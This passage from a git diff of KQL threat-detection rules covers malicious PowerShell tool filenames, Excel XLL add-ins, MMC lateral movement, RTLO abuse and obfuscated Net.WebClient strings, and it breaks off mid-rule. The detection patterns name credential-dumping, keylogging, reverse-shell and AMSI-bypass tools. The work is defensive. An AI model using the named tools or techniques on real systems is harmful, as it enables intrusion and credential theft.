"\\Execute-DNSTXT-Code.ps1" or FolderPath endswith "\\Execute-OnTime.ps1" or FolderPath endswith "\\ExetoText.ps1" or FolderPath endswith "\\Exploit-Jboss.ps1" or FolderPath endswith "\\Find-AVSignature.ps1" or FolderPath endswith "\\Find-Fruit.ps1" or FolderPath endswith "\\Find-GPOLocation.ps1" or FolderPath endswith "\\Find-TrustedDocuments.ps1" or FolderPath endswith "\\FireBuster.ps1" or FolderPath endswith "\\FireListener.ps1" or FolderPath endswith "\\Get-ApplicationHost.ps1" or FolderPath endswith "\\Get-ChromeDump.ps1" or FolderPath endswith "\\Get-ClipboardContents.ps1" or FolderPath endswith "\\Get-ComputerDetail.ps1" or FolderPath endswith "\\Get-FoxDump.ps1" or FolderPath endswith "\\Get-GPPAutologon.ps1" or FolderPath endswith "\\Get-GPPPassword.ps1" or FolderPath endswith "\\Get-IndexedItem.ps1" or FolderPath endswith "\\Get-Keystrokes.ps1" or FolderPath endswith "\\Get-LSASecret.ps1" or FolderPath endswith "\\Get-MicrophoneAudio.ps1" or FolderPath endswith "\\Get-PassHashes.ps1" or FolderPath endswith "\\Get-PassHints.ps1" or FolderPath endswith "\\Get-RegAlwaysInstallElevated.ps1" or FolderPath endswith "\\Get-RegAutoLogon.ps1" or FolderPath endswith "\\Get-RickAstley.ps1" or FolderPath endswith "\\Get-Screenshot.ps1" or FolderPath endswith "\\Get-SecurityPackages.ps1" or FolderPath endswith "\\Get-ServiceFilePermission.ps1" or FolderPath endswith "\\Get-ServicePermission.ps1" or FolderPath endswith "\\Get-ServiceUnquoted.ps1" or FolderPath endswith "\\Get-SiteListPassword.ps1" or FolderPath endswith "\\Get-System.ps1" or FolderPath endswith "\\Get-TimedScreenshot.ps1" or FolderPath endswith "\\Get-UnattendedInstallFile.ps1" or FolderPath endswith "\\Get-Unconstrained.ps1" or FolderPath endswith "\\Get-USBKeystrokes.ps1" or FolderPath endswith "\\Get-VaultCredential.ps1" or FolderPath endswith "\\Get-VulnAutoRun.ps1" or FolderPath endswith "\\Get-VulnSchTask.ps1" or FolderPath endswith "\\Get-WebConfig.ps1" or FolderPath endswith "\\Get-WebCredentials.ps1" or FolderPath endswith "\\Get-WLAN-Keys.ps1" or FolderPath endswith "\\Gupt-Backdoor.ps1" or FolderPath endswith "\\HTTP-Backdoor.ps1" or FolderPath endswith "\\HTTP-Login.ps1" or FolderPath endswith "\\Install-ServiceBinary.ps1" or FolderPath endswith "\\Install-SSP.ps1" or FolderPath endswith "\\Invoke-ACLScanner.ps1" or FolderPath endswith "\\Invoke-ADSBackdoor.ps1" or FolderPath endswith "\\Invoke-AmsiBypass.ps1" or FolderPath endswith "\\Invoke-ARPScan.ps1" or FolderPath endswith "\\Invoke-BackdoorLNK.ps1" or FolderPath endswith "\\Invoke-BadPotato.ps1" or FolderPath endswith "\\Invoke-BetterSafetyKatz.ps1" or FolderPath endswith "\\Invoke-BruteForce.ps1" or FolderPath endswith "\\Invoke-BypassUAC.ps1" or FolderPath endswith "\\Invoke-Carbuncle.ps1" or FolderPath endswith "\\Invoke-Certify.ps1" or FolderPath endswith "\\Invoke-ConPtyShell.ps1" or FolderPath endswith "\\Invoke-CredentialInjection.ps1" or FolderPath endswith "\\Invoke-CredentialsPhish.ps1" or FolderPath endswith "\\Invoke-DAFT.ps1" or FolderPath endswith "\\Invoke-DCSync.ps1" or FolderPath endswith "\\Invoke-Decode.ps1" or FolderPath endswith "\\Invoke-DinvokeKatz.ps1" or FolderPath endswith "\\Invoke-DllInjection.ps1" or FolderPath endswith "\\Invoke-DNSUpdate.ps1" or FolderPath endswith "\\Invoke-DowngradeAccount.ps1" or FolderPath endswith "\\Invoke-EgressCheck.ps1" or FolderPath endswith "\\Invoke-Encode.ps1" or FolderPath endswith "\\Invoke-EventViewer.ps1" or FolderPath endswith "\\Invoke-Eyewitness.ps1" or FolderPath endswith "\\Invoke-FakeLogonScreen.ps1" or FolderPath endswith "\\Invoke-Farmer.ps1" or FolderPath endswith "\\Invoke-Get-RBCD-Threaded.ps1" or FolderPath endswith "\\Invoke-Gopher.ps1" or FolderPath endswith "\\Invoke-Grouper2.ps1" or FolderPath endswith "\\Invoke-Grouper3.ps1" or FolderPath endswith "\\Invoke-HandleKatz.ps1" or FolderPath endswith "\\Invoke-Interceptor.ps1" or FolderPath endswith "\\Invoke-Internalmonologue.ps1" or FolderPath endswith "\\Invoke-Inveigh.ps1" or FolderPath endswith "\\Invoke-InveighRelay.ps1" or FolderPath endswith "\\Invoke-JSRatRegsvr.ps1" or FolderPath endswith "\\Invoke-JSRatRundll.ps1" or FolderPath endswith "\\Invoke-KrbRelay.ps1" or FolderPath endswith "\\Invoke-KrbRelayUp.ps1" or FolderPath endswith "\\Invoke-LdapSignCheck.ps1" or FolderPath endswith "\\Invoke-Lockless.ps1" or FolderPath endswith "\\Invoke-MalSCCM.ps1" or FolderPath endswith "\\Invoke-Mimikatz.ps1" or FolderPath endswith "\\Invoke-MimikatzWDigestDowngrade.ps1" or FolderPath endswith "\\Invoke-Mimikittenz.ps1" or FolderPath endswith "\\Invoke-MITM6.ps1" or FolderPath endswith "\\Invoke-NanoDump.ps1" or FolderPath endswith "\\Invoke-NetRipper.ps1" or FolderPath endswith "\\Invoke-NetworkRelay.ps1" or FolderPath endswith "\\Invoke-NinjaCopy.ps1" or FolderPath endswith "\\Invoke-OxidResolver.ps1" or FolderPath endswith "\\Invoke-P0wnedshell.ps1" or FolderPath endswith "\\Invoke-P0wnedshellx86.ps1" or FolderPath endswith "\\Invoke-Paranoia.ps1" or FolderPath endswith "\\Invoke-PortScan.ps1" or FolderPath endswith "\\Invoke-PoshRatHttp.ps1" or FolderPath endswith "\\Invoke-PoshRatHttps.ps1" or FolderPath endswith "\\Invoke-PostExfil.ps1" or FolderPath endswith "\\Invoke-PowerDump.ps1" or FolderPath endswith "\\Invoke-PowerDPAPI.ps1" or FolderPath endswith "\\Invoke-PowerShellIcmp.ps1" or FolderPath endswith "\\Invoke-PowerShellTCP.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLineBind.ps1" or FolderPath endswith "\\Invoke-PowerShellUdp.ps1" or FolderPath endswith "\\Invoke-PowerShellUdpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellWMI.ps1" or FolderPath endswith "\\Invoke-PowerThIEf.ps1" or FolderPath endswith "\\Invoke-PPLDump.ps1" or FolderPath endswith "\\Invoke-Prasadhak.ps1" or FolderPath endswith "\\Invoke-PsExec.ps1" or FolderPath endswith "\\Invoke-PsGcat.ps1" or FolderPath endswith "\\Invoke-PsGcatAgent.ps1" or FolderPath endswith "\\Invoke-PSInject.ps1" or FolderPath endswith "\\Invoke-PsUaCme.ps1" or FolderPath endswith "\\Invoke-ReflectivePEInjection.ps1" or FolderPath endswith "\\Invoke-ReverseDNSLookup.ps1" or FolderPath endswith "\\Invoke-Rubeus.ps1" or FolderPath endswith "\\Invoke-RunAs.ps1" or FolderPath endswith "\\Invoke-SafetyKatz.ps1" or FolderPath endswith "\\Invoke-SauronEye.ps1" or FolderPath endswith "\\Invoke-SCShell.ps1" or FolderPath endswith "\\Invoke-Seatbelt.ps1" or FolderPath endswith "\\Invoke-ServiceAbuse.ps1" or FolderPath endswith "\\Invoke-SessionGopher.ps1" or FolderPath endswith "\\Invoke-ShellCode.ps1" or FolderPath endswith "\\Invoke-SMBScanner.ps1" or FolderPath endswith "\\Invoke-Snaffler.ps1" or FolderPath endswith "\\Invoke-Spoolsample.ps1" or FolderPath endswith "\\Invoke-SSHCommand.ps1" or FolderPath endswith "\\Invoke-SSIDExfil.ps1" or FolderPath endswith "\\Invoke-StandIn.ps1" or FolderPath endswith "\\Invoke-StickyNotesExtract.ps1" or FolderPath endswith "\\Invoke-Tater.ps1" or FolderPath endswith "\\Invoke-Thunderfox.ps1" or FolderPath endswith "\\Invoke-ThunderStruck.ps1" or FolderPath endswith "\\Invoke-TokenManipulation.ps1" or FolderPath endswith "\\Invoke-Tokenvator.ps1" or FolderPath endswith "\\Invoke-TotalExec.ps1" or FolderPath endswith "\\Invoke-UrbanBishop.ps1" or FolderPath endswith "\\Invoke-UserHunter.ps1" or FolderPath endswith "\\Invoke-VoiceTroll.ps1" or FolderPath endswith "\\Invoke-Whisker.ps1" or FolderPath endswith "\\Invoke-WinEnum.ps1" or FolderPath endswith "\\Invoke-winPEAS.ps1" or FolderPath endswith "\\Invoke-WireTap.ps1" or FolderPath endswith "\\Invoke-WmiCommand.ps1" or FolderPath endswith "\\Invoke-WScriptBypassUAC.ps1" or FolderPath endswith "\\Invoke-Zerologon.ps1" or FolderPath endswith "\\Keylogger.ps1" or FolderPath endswith "\\MailRaider.ps1" or FolderPath endswith "\\New-HoneyHash.ps1" or FolderPath endswith "\\OfficeMemScraper.ps1" or FolderPath endswith "\\Offline_Winpwn.ps1" or FolderPath endswith "\\Out-CHM.ps1" or FolderPath endswith "\\Out-DnsTxt.ps1" or FolderPath endswith "\\Out-Excel.ps1" or FolderPath endswith "\\Out-HTA.ps1" or FolderPath endswith "\\Out-Java.ps1" or FolderPath endswith "\\Out-JS.ps1" or FolderPath endswith "\\Out-Minidump.ps1" or FolderPath endswith "\\Out-RundllCommand.ps1" or FolderPath endswith "\\Out-SCF.ps1" or FolderPath endswith "\\Out-SCT.ps1" or FolderPath endswith "\\Out-Shortcut.ps1" or FolderPath endswith "\\Out-WebQuery.ps1" or FolderPath endswith "\\Out-Word.ps1" or FolderPath endswith "\\Parse_Keys.ps1" or FolderPath endswith "\\Port-Scan.ps1" or FolderPath endswith "\\PowerBreach.ps1" or FolderPath endswith "\\powercat.ps1" or FolderPath endswith "\\Powermad.ps1" or FolderPath endswith "\\PowerRunAsSystem.psm1" or FolderPath endswith "\\PowerSharpPack.ps1" or FolderPath endswith "\\PowerUp.ps1" or FolderPath endswith "\\PowerUpSQL.ps1" or FolderPath endswith "\\PowerView.ps1" or FolderPath endswith "\\PSAsyncShell.ps1" or FolderPath endswith "\\RemoteHashRetrieval.ps1" or FolderPath endswith "\\Remove-Persistence.ps1" or FolderPath endswith "\\Remove-PoshRat.ps1" or FolderPath endswith "\\Remove-Update.ps1" or FolderPath endswith "\\Run-EXEonRemote.ps1" or FolderPath endswith "\\Schtasks-Backdoor.ps1" or FolderPath endswith "\\Set-DCShadowPermissions.ps1" or FolderPath endswith "\\Set-MacAttribute.ps1" or FolderPath endswith "\\Set-RemotePSRemoting.ps1" or FolderPath endswith "\\Set-RemoteWMI.ps1" or FolderPath endswith "\\Set-Wallpaper.ps1" or FolderPath endswith "\\Show-TargetScreen.ps1" or FolderPath endswith "\\Speak.ps1" or FolderPath endswith "\\Start-CaptureServer.ps1" or FolderPath endswith "\\Start-WebcamRecorder.ps1" or FolderPath endswith "\\StringToBase64.ps1" or FolderPath endswith "\\TexttoExe.ps1" or FolderPath endswith "\\Veeam-Get-Creds.ps1" or FolderPath endswith "\\VolumeShadowCopyTools.ps1" or FolderPath endswith "\\WinPwn.ps1" or FolderPath endswith "\\WSUSpendu.ps1") or (FolderPath contains "Invoke-Sharp" and FolderPath endswith ".ps1") \ No newline at end of file diff --git a/KQL/rules/Execution/microsoft_excel_add_in_loaded_from_uncommon_location.kql b/KQL/rules/Execution/microsoft_excel_add_in_loaded_from_uncommon_location.kql index 2c66a4e1..0ed18510 100644 --- a/KQL/rules/Execution/microsoft_excel_add_in_loaded_from_uncommon_location.kql +++ b/KQL/rules/Execution/microsoft_excel_add_in_loaded_from_uncommon_location.kql @@ -1,12 +1,12 @@ -// Title: Microsoft Excel Add-In Loaded From Uncommon Location -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-12 -// Level: medium -// Description: Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.002 -// False Positives: -// - Some tuning might be required to allow or remove certain locations used by the rule if you consider them as safe locations - -DeviceImageLoadEvents +// Title: Microsoft Excel Add-In Loaded From Uncommon Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-12 +// Level: medium +// Description: Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 +// False Positives: +// - Some tuning might be required to allow or remove certain locations used by the rule if you consider them as safe locations + +DeviceImageLoadEvents | where (FolderPath contains "\\Desktop\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Perflogs\\" or FolderPath contains "\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Tasks\\") and FolderPath endswith ".xll" and InitiatingProcessFolderPath endswith "\\excel.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql b/KQL/rules/Execution/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql index 53a1c169..61e657fb 100644 --- a/KQL/rules/Execution/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql +++ b/KQL/rules/Execution/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql @@ -1,12 +1,12 @@ -// Title: Microsoft VBA For Outlook Addin Loaded Via Outlook -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-08 -// Level: medium -// Description: Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.002 -// False Positives: -// - Legitimate macro usage. Add the appropriate filter according to your environment - -DeviceImageLoadEvents +// Title: Microsoft VBA For Outlook Addin Loaded Via Outlook +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-08 +// Level: medium +// Description: Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 +// False Positives: +// - Legitimate macro usage. Add the appropriate filter according to your environment + +DeviceImageLoadEvents | where FolderPath endswith "\\outlvba.dll" and InitiatingProcessFolderPath endswith "\\outlook.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/mmc20_lateral_movement.kql b/KQL/rules/Execution/mmc20_lateral_movement.kql index 9118011c..bba62e68 100644 --- a/KQL/rules/Execution/mmc20_lateral_movement.kql +++ b/KQL/rules/Execution/mmc20_lateral_movement.kql @@ -1,12 +1,12 @@ -// Title: MMC20 Lateral Movement -// Author: @2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea) -// Date: 2020-03-04 -// Level: high -// Description: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe -// MITRE Tactic: Execution -// Tags: attack.execution, attack.lateral-movement, attack.t1021.003 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: MMC20 Lateral Movement +// Author: @2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea) +// Date: 2020-03-04 +// Level: high +// Description: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe +// MITRE Tactic: Execution +// Tags: attack.execution, attack.lateral-movement, attack.t1021.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "-Embedding" and FolderPath endswith "\\mmc.exe" and InitiatingProcessFolderPath endswith "\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql b/KQL/rules/Execution/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql index d33c3002..ee4ffaf4 100644 --- a/KQL/rules/Execution/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql +++ b/KQL/rules/Execution/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql @@ -1,13 +1,13 @@ -// Title: MMC Executing Files with Reversed Extensions Using RTLO Abuse -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-02-05 -// Level: high -// Description: Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.002, attack.defense-evasion, attack.t1218.014, attack.t1036.002 -// False Positives: -// - Legitimate administrative actions using MMC to execute misnamed `.msc` files. -// - Unconventional but non-malicious usage of RLO or reversed extensions. - -DeviceProcessEvents +// Title: MMC Executing Files with Reversed Extensions Using RTLO Abuse +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-02-05 +// Level: high +// Description: Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002, attack.defense-evasion, attack.t1218.014, attack.t1036.002 +// False Positives: +// - Legitimate administrative actions using MMC to execute misnamed `.msc` files. +// - Unconventional but non-malicious usage of RLO or reversed extensions. + +DeviceProcessEvents | where (ProcessCommandLine contains "cod.msc" or ProcessCommandLine contains "fdp.msc" or ProcessCommandLine contains "ftr.msc" or ProcessCommandLine contains "lmth.msc" or ProcessCommandLine contains "slx.msc" or ProcessCommandLine contains "tdo.msc" or ProcessCommandLine contains "xcod.msc" or ProcessCommandLine contains "xslx.msc" or ProcessCommandLine contains "xtpp.msc") and (FolderPath endswith "\\mmc.exe" or ProcessVersionInfoOriginalFileName =~ "MMC.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql b/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql index e4b8f77e..460baa31 100644 --- a/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql +++ b/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql @@ -1,13 +1,13 @@ -// Title: MMC Loading Script Engines DLLs -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-02-05 -// Level: medium -// Description: Detects when the Microsoft Management Console (MMC) loads the DLL libraries like vbscript, jscript etc which might indicate an attempt -// to execute malicious scripts within a trusted system process for bypassing application whitelisting or defense evasion. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1059.005, attack.t1218.014 -// False Positives: -// - Legitimate MMC operations or extensions loading these libraries - -DeviceImageLoadEvents +// Title: MMC Loading Script Engines DLLs +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-02-05 +// Level: medium +// Description: Detects when the Microsoft Management Console (MMC) loads the DLL libraries like vbscript, jscript etc which might indicate an attempt +// to execute malicious scripts within a trusted system process for bypassing application whitelisting or defense evasion. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1059.005, attack.t1218.014 +// False Positives: +// - Legitimate MMC operations or extensions loading these libraries + +DeviceImageLoadEvents | where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\jscript.dll" or FolderPath endswith "\\jscript9.dll") and InitiatingProcessFolderPath endswith "\\mmc.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/named_pipe_created_via_mkfifo.kql b/KQL/rules/Execution/named_pipe_created_via_mkfifo.kql index f617b3f4..bc0c6ea5 100644 --- a/KQL/rules/Execution/named_pipe_created_via_mkfifo.kql +++ b/KQL/rules/Execution/named_pipe_created_via_mkfifo.kql @@ -1,10 +1,10 @@ -// Title: Named Pipe Created Via Mkfifo -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-16 -// Level: low -// Description: Detects the creation of a new named pipe using the "mkfifo" utility -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Named Pipe Created Via Mkfifo +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-16 +// Level: low +// Description: Detects the creation of a new named pipe using the "mkfifo" utility +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where FolderPath endswith "/mkfifo" \ No newline at end of file diff --git a/KQL/rules/Execution/net_webclient_casing_anomalies.kql b/KQL/rules/Execution/net_webclient_casing_anomalies.kql index 0917a37e..f63a8bc5 100644 --- a/KQL/rules/Execution/net_webclient_casing_anomalies.kql +++ b/KQL/rules/Execution/net_webclient_casing_anomalies.kql @@ -1,10 +1,10 @@ -// Title: Net WebClient Casing Anomalies -// Author: Florian Roth (Nextron Systems) -// Date: 2022-05-24 -// Level: high -// Description: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: Net WebClient Casing Anomalies +// Author: Florian Roth (Nextron Systems) +// Date: 2022-05-24 +// Level: high +// Description: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents | where (ProcessCommandLine contains "TgBlAFQALgB3AEUAQg" or ProcessCommandLine contains "4AZQBUAC4AdwBFAEIA" or ProcessCommandLine contains "OAGUAVAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AGUAYg" or ProcessCommandLine contains "4ARQB0AC4AdwBlAGIA" or ProcessCommandLine contains "uAEUAdAAuAHcAZQBiA" or ProcessCommandLine contains "TgBFAHQALgB3AGUAYg" or ProcessCommandLine contains "OAEUAdAAuAHcAZQBiA" or ProcessCommandLine contains "bgBlAFQALgB3AGUAYg" or ProcessCommandLine contains "4AZQBUAC4AdwBlAGIA" or ProcessCommandLine contains "uAGUAVAAuAHcAZQBiA" or ProcessCommandLine contains "TgBlAFQALgB3AGUAYg" or ProcessCommandLine contains "OAGUAVAAuAHcAZQBiA" or ProcessCommandLine contains "bgBFAFQALgB3AGUAYg" or ProcessCommandLine contains "4ARQBUAC4AdwBlAGIA" or ProcessCommandLine contains "uAEUAVAAuAHcAZQBiA" or ProcessCommandLine contains "bgBlAHQALgBXAGUAYg" or ProcessCommandLine contains "4AZQB0AC4AVwBlAGIA" or ProcessCommandLine contains "uAGUAdAAuAFcAZQBiA" or ProcessCommandLine contains "bgBFAHQALgBXAGUAYg" or ProcessCommandLine contains "4ARQB0AC4AVwBlAGIA" or ProcessCommandLine contains "uAEUAdAAuAFcAZQBiA" or ProcessCommandLine contains "TgBFAHQALgBXAGUAYg" or ProcessCommandLine contains "OAEUAdAAuAFcAZQBiA" or ProcessCommandLine contains "bgBlAFQALgBXAGUAYg" or ProcessCommandLine contains "4AZQBUAC4AVwBlAGIA" or ProcessCommandLine contains "uAGUAVAAuAFcAZQBiA" or ProcessCommandLine contains "TgBlAFQALgBXAGUAYg" or ProcessCommandLine contains "OAGUAVAAuAFcAZQBiA" or ProcessCommandLine contains "bgBFAFQALgBXAGUAYg" or ProcessCommandLine contains "4ARQBUAC4AVwBlAGIA" or ProcessCommandLine contains "uAEUAVAAuAFcAZQBiA" or ProcessCommandLine contains "bgBlAHQALgB3AEUAYg" or ProcessCommandLine contains "4AZQB0AC4AdwBFAGIA" or ProcessCommandLine contains "uAGUAdAAuAHcARQBiA" or ProcessCommandLine contains "TgBlAHQALgB3AEUAYg" or ProcessCommandLine contains "OAGUAdAAuAHcARQBiA" or ProcessCommandLine contains "bgBFAHQALgB3AEUAYg" or ProcessCommandLine contains "4ARQB0AC4AdwBFAGIA" or ProcessCommandLine contains "uAEUAdAAuAHcARQBiA" or ProcessCommandLine contains "TgBFAHQALgB3AEUAYg" or ProcessCommandLine contains "OAEUAdAAuAHcARQBiA" or ProcessCommandLine contains "bgBlAFQALgB3AEUAYg" or ProcessCommandLine contains "4AZQBUAC4AdwBFAGIA" or ProcessCommandLine contains "uAGUAVAAuAHcARQBiA" or ProcessCommandLine contains "TgBlAFQALgB3AEUAYg" or ProcessCommandLine contains "OAGUAVAAuAHcARQBiA" or ProcessCommandLine contains "bgBFAFQALgB3AEUAYg" or ProcessCommandLine contains "4ARQBUAC4AdwBFAGIA" or ProcessCommandLine contains "uAEUAVAAuAHcARQBiA" or ProcessCommandLine contains "TgBFAFQALgB3AEUAYg" or ProcessCommandLine contains "OAEUAVAAuAHcARQBiA" or ProcessCommandLine contains "bgBlAHQALgBXAEUAYg" or ProcessCommandLine contains "4AZQB0AC4AVwBFAGIA" or ProcessCommandLine contains "uAGUAdAAuAFcARQBiA" or ProcessCommandLine contains "TgBlAHQALgBXAEUAYg" or ProcessCommandLine contains "OAGUAdAAuAFcARQBiA" or ProcessCommandLine contains "bgBFAHQALgBXAEUAYg" or ProcessCommandLine contains "4ARQB0AC4AVwBFAGIA" or ProcessCommandLine contains "uAEUAdAAuAFcARQBiA" or ProcessCommandLine contains "TgBFAHQALgBXAEUAYg" or ProcessCommandLine contains "OAEUAdAAuAFcARQBiA" or ProcessCommandLine contains "bgBlAFQALgBXAEUAYg" or ProcessCommandLine contains "4AZQBUAC4AVwBFAGIA" or ProcessCommandLine contains "uAGUAVAAuAFcARQBiA" or ProcessCommandLine contains "TgBlAFQALgBXAEUAYg" or ProcessCommandLine contains "OAGUAVAAuAFcARQBiA" or ProcessCommandLine contains "bgBFAFQALgBXAEUAYg" or ProcessCommandLine contains "4ARQBUAC4AVwBFAGIA" or ProcessCommandLine contains "uAEUAVAAuAFcARQBiA" or ProcessCommandLine contains "TgBFAFQALgBXAEUAYg" or ProcessCommandLine contains "OAEUAVAAuAFcARQBiA" or ProcessCommandLine contains "bgBlAHQALgB3AGUAQg" or ProcessCommandLine contains "4AZQB0AC4AdwBlAEIA" or ProcessCommandLine contains "uAGUAdAAuAHcAZQBCA" or ProcessCommandLine contains "TgBlAHQALgB3AGUAQg" or ProcessCommandLine contains "OAGUAdAAuAHcAZQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AGUAQg" or ProcessCommandLine contains "4ARQB0AC4AdwBlAEIA" or ProcessCommandLine contains "uAEUAdAAuAHcAZQBCA" or ProcessCommandLine contains "TgBFAHQALgB3AGUAQg" or ProcessCommandLine contains "OAEUAdAAuAHcAZQBCA" or ProcessCommandLine contains "bgBlAFQALgB3AGUAQg" or ProcessCommandLine contains "4AZQBUAC4AdwBlAEIA" or ProcessCommandLine contains "uAGUAVAAuAHcAZQBCA" or ProcessCommandLine contains "TgBlAFQALgB3AGUAQg" or ProcessCommandLine contains "OAGUAVAAuAHcAZQBCA" or ProcessCommandLine contains "bgBFAFQALgB3AGUAQg" or ProcessCommandLine contains "4ARQBUAC4AdwBlAEIA" or ProcessCommandLine contains "uAEUAVAAuAHcAZQBCA" or ProcessCommandLine contains "TgBFAFQALgB3AGUAQg" or ProcessCommandLine contains "OAEUAVAAuAHcAZQBCA" or ProcessCommandLine contains "bgBlAHQALgBXAGUAQg" or ProcessCommandLine contains "4AZQB0AC4AVwBlAEIA" or ProcessCommandLine contains "uAGUAdAAuAFcAZQBCA" or ProcessCommandLine contains "TgBlAHQALgBXAGUAQg" or ProcessCommandLine contains "OAGUAdAAuAFcAZQBCA" or ProcessCommandLine contains "bgBFAHQALgBXAGUAQg" or ProcessCommandLine contains "4ARQB0AC4AVwBlAEIA" or ProcessCommandLine contains "uAEUAdAAuAFcAZQBCA" or ProcessCommandLine contains "TgBFAHQALgBXAGUAQg" or ProcessCommandLine contains "OAEUAdAAuAFcAZQBCA" or ProcessCommandLine contains "bgBlAFQALgBXAGUAQg" or ProcessCommandLine contains "4AZQBUAC4AVwBlAEIA" or ProcessCommandLine contains "uAGUAVAAuAFcAZQBCA" or ProcessCommandLine contains "TgBlAFQALgBXAGUAQg" or ProcessCommandLine contains "OAGUAVAAuAFcAZQBCA" or ProcessCommandLine contains "bgBFAFQALgBXAGUAQg" or ProcessCommandLine contains "4ARQBUAC4AVwBlAEIA" or ProcessCommandLine contains "uAEUAVAAuAFcAZQBCA" or ProcessCommandLine contains "TgBFAFQALgBXAGUAQg" or ProcessCommandLine contains "OAEUAVAAuAFcAZQBCA" or ProcessCommandLine contains "bgBlAHQALgB3AEUAQg" or ProcessCommandLine contains "4AZQB0AC4AdwBFAEIA" or ProcessCommandLine contains "uAGUAdAAuAHcARQBCA" or ProcessCommandLine contains "TgBlAHQALgB3AEUAQg" or ProcessCommandLine contains "OAGUAdAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AEUAQg" or ProcessCommandLine contains "4ARQB0AC4AdwBFAEIA" or ProcessCommandLine contains "uAEUAdAAuAHcARQBCA" or ProcessCommandLine contains "TgBFAHQALgB3AEUAQg" or ProcessCommandLine contains "OAEUAdAAuAHcARQBCA" or ProcessCommandLine contains "bgBlAFQALgB3AEUAQg" or ProcessCommandLine contains "uAGUAVAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAFQALgB3AEUAQg" or ProcessCommandLine contains "4ARQBUAC4AdwBFAEIA" or ProcessCommandLine contains "uAEUAVAAuAHcARQBCA" or ProcessCommandLine contains "TgBFAFQALgB3AEUAQg" or ProcessCommandLine contains "OAEUAVAAuAHcARQBCA" or ProcessCommandLine contains "TgBlAHQALgBXAEUAQg" or ProcessCommandLine contains "4AZQB0AC4AVwBFAEIA" or ProcessCommandLine contains "OAGUAdAAuAFcARQBCA" or ProcessCommandLine contains "bgBFAHQALgBXAEUAQg" or ProcessCommandLine contains "4ARQB0AC4AVwBFAEIA" or ProcessCommandLine contains "uAEUAdAAuAFcARQBCA" or ProcessCommandLine contains "TgBFAHQALgBXAEUAQg" or ProcessCommandLine contains "OAEUAdAAuAFcARQBCA" or ProcessCommandLine contains "bgBlAFQALgBXAEUAQg" or ProcessCommandLine contains "4AZQBUAC4AVwBFAEIA" or ProcessCommandLine contains "uAGUAVAAuAFcARQBCA" or ProcessCommandLine contains "TgBlAFQALgBXAEUAQg" or ProcessCommandLine contains 